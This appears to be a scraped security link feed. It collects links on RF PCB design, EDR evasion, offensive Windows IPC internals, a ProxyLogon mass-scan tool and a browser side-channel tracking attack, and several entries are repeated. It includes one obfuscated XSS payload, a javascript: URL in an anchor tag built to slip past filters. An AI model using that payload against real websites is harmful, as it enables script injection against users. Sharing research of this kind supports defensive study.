Watch "Practical RF Hardware and PCB Design Tips" on YouTube
https://youtu.be/_Hfzq1QES-Q
https://youtu.be/_Hfzq1QES-Q
YouTube
Practical RF Hardware and PCB Design Tips - Phil's Lab #19
Some tips for when designing hardware and PCBs with simple RF sections and components. These concepts have aided me well when designing 4-layer embedded systems PCBs.
Topics: critical trace lengths, stackups, controlled impedance traces (microstrip, stripline)…
Topics: critical trace lengths, stackups, controlled impedance traces (microstrip, stripline)…
Endpoint Detection and Response: How Hackers Have Evolved
https://www.optiv.com/explore-optiv-insights/source-zero/endpoint-detection-and-response-how-hackers-have-evolved
https://www.optiv.com/explore-optiv-insights/source-zero/endpoint-detection-and-response-how-hackers-have-evolved
Optiv
Endpoint Detection and Response: How Hackers Have Evolved
This post identifies systemic endpoint detection and response issues and examines how attackers can bypass any EDR product.
EDR and Blending In: How Attackers Avoid Getting Caught
Part 2 of the series
https://www.optiv.com/explore-optiv-insights/source-zero/edr-and-blending-how-attackers-avoid-getting-caught
Part 2 of the series
https://www.optiv.com/explore-optiv-insights/source-zero/edr-and-blending-how-attackers-avoid-getting-caught
#Offensive_security
Offensive Windows IPC Internals 2: RPC
https://csandker.io/2021/02/21/Offensive-Windows-IPC-2-RPC.html
Offensive Windows IPC Internals 1: Named Pipes
https://csandker.io/2021/01/10/Offensive-Windows-IPC-1-NamedPipes.html
Offensive Windows IPC Internals 2: RPC
https://csandker.io/2021/02/21/Offensive-Windows-IPC-2-RPC.html
Offensive Windows IPC Internals 1: Named Pipes
https://csandker.io/2021/01/10/Offensive-Windows-IPC-1-NamedPipes.html
<a/href="j%0A%0Davanoscript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click
XSS Payload
XSS Payload
dwisiswant0/proxylogscan - A fast tool to mass scan for a vulnerability on Microsoft Exchange Server that allows an attacker bypassing the authentication and impersonating as the admin (CVE-2021-26855) / ProxyLogon.
https://ift.tt/3cgBplO
https://ift.tt/3cgBplO
Browser exploit via side channel attack: Researchers have discovered a new side-channel that they say can be reliably exploited to leak information from web browsers that could then be leveraged to track users even when JavaScript is completely disabled.
"This is a side-channel attack which doesn't require any JavaScript to run," the researchers said. "This means noscript blockers cannot stop it. The attacks work even if you strip out all of the fun parts of the web browsing experience. This makes it very difficult to prevent without modifying deep parts of the operating system."
https://arxiv.org/abs/2103.04952
https://thehackernews.com/2021/03/new-browser-attack-allows-tracking.html
"This is a side-channel attack which doesn't require any JavaScript to run," the researchers said. "This means noscript blockers cannot stop it. The attacks work even if you strip out all of the fun parts of the web browsing experience. This makes it very difficult to prevent without modifying deep parts of the operating system."
https://arxiv.org/abs/2103.04952
https://thehackernews.com/2021/03/new-browser-attack-allows-tracking.html